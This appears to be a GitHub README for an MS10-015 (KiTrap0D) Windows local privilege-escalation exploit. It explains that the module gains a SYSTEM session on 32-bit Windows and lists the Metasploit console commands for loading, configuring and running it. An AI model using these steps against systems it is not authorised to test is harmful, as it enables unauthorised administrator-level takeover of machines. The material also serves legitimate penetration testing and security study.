Skip to content

Latest commit

 

History

History

MS10-015

MS10-015

This module will create a new session with SYSTEM privileges via the KiTrap0D exlpoit by Tavis Ormandy. 
If the session is use is already elevated then the exploit will not run. 
The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

Vulnerability reference:

Usage

c:\> vdmallowed.exe

win2003

load the module within the Metasploit console

msf > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > show targets
    ...targets...
msf exploit(ms10_015_kitrap0d) > set TARGET <target-id>
msf exploit(ms10_015_kitrap0d) > show options
    ...show and set options...
msf exploit(ms10_015_kitrap0d) > exploit
    

Reference